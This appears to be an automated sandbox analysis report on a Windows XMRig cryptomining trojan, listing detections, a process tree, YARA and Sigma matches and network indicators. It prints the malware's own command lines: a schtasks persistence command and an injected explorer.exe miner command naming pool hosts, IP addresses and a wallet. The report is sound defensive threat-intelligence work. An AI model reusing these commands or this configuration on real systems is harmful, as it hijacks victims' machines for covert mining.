Windows Analysis Report pcNCraWcRk

Overview

General Information

Sample Name: pcNCraWcRk (renamed file extension from none to exe)
Analysis ID: 513056
MD5: 0958fa69ba0e6645c42215c5325d8f76
SHA1: 800666827e118ce78aef55c47864512ef9d3b7a6
SHA256: 1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
Tags: exe, trojan

Detection

BitCoin Miner Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected BitCoin Miner
Sigma detected: Xmrig
Writes to foreign memory regions
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Detected Stratum mining protocol
Allocates memory in foreign processes
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates driver files
Dropped file seen in connection with other malware
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • pcNCraWcRk.exe (PID: 1380 cmdline: 'C:\Users\user\Desktop\pcNCraWcRk.exe' MD5: 0958FA69BA0E6645C42215C5325D8F76)
    • conhost.exe (PID: 612 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4564 cmdline: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6456 cmdline: schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 5140 cmdline: 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • services64.exe (PID: 6756 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 0958FA69BA0E6645C42215C5325D8F76)
          • conhost.exe (PID: 5952 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6784 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • services64.exe (PID: 3496 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 0958FA69BA0E6645C42215C5325D8F76)
    • conhost.exe (PID: 5252 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sihost64.exe (PID: 5264 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe' MD5: 2497F634A80476AE2EAE956D8B84528E)
        • conhost.exe (PID: 5932 cmdline: 'C:\Windows\System32\conhost.exe' '/sihost64' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6764 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

            Unpacked PEs

Source | Rule | Description | Author | Strings (matched strings listed beneath each row)
17.0.explorer.exe.140000000.12.unpack | PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 | Detects XMRIG crypto coin miners | Florian Roth
  • 0x4d6674:$x1: xmrig.exe
  • 0x4d6560:$x2: xmrig.com
  • 0x4d6638:$x2: xmrig.com
17.0.explorer.exe.140000000.12.unpack | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth
  • 0x457915:$s01: --cpu-priority=
  • 0x45726d:$s05: --nicehash
17.0.explorer.exe.140000000.12.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x4617f1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
17.0.explorer.exe.140000000.12.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
17.0.explorer.exe.140000000.2.unpack | PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 | Detects XMRIG crypto coin miners | Florian Roth
  • 0x4d6674:$x1: xmrig.exe
  • 0x4d6560:$x2: xmrig.com
  • 0x4d6638:$x2: xmrig.com

              Sigma Overview

              Bitcoin Miner:

Sigma detected: Xmrig
Source: Process started, Author: Joe Security, Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100, CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100, CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe', ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 5952, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100, ProcessId: 6784

              System Summary:

Sigma detected: Conhost Parent Process Executions
Source: Process started, Author: omkar72, Data: Command: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', CommandLine: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe', ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 612, ProcessCommandLine: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', ProcessId: 4564

              Jbx Signature Overview


              AV Detection:

Multi AV Scanner detection for submitted file
Source: pcNCraWcRk.exe, Virustotal: Detection: 64%
Source: pcNCraWcRk.exe, Metadefender: Detection: 31%
Source: pcNCraWcRk.exe, ReversingLabs: Detection: 81%
Antivirus / Scanner detection for submitted sample
Source: pcNCraWcRk.exe, Avira: detected
Multi AV Scanner detection for domain / URL
Source: xmr.givemexyz.in, Virustotal: Detection: 15%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe, Avira: detection malicious, Label: TR/Agent.ywcqa
Source: C:\Users\user\AppData\Local\Temp\services64.exe, Avira: detection malicious, Label: TR/Agent.wbqui
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\services64.exe, Virustotal: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\services64.exe, Metadefender: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\services64.exe, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe, Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe, ReversingLabs: Detection: 82%

              Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Yara detected BitCoin Miner
Source: Yara match, File source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, String found in binary or memory: FileDescriptionXMRig miner.
Detected Stratum mining protocol
Source: global traffic, TCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb, source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr

              Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 198.23.214.117 144
Source: C:\Windows\explorer.exe, Domain query: xmr.givemexyz.in
Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: global traffic, TCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr, String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr, String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr, String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr, String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: conhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown, DNS traffic detected: queries for: xmr.givemexyz.in

              System Summary:

Malicious sample detected (through community Yara rule)
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
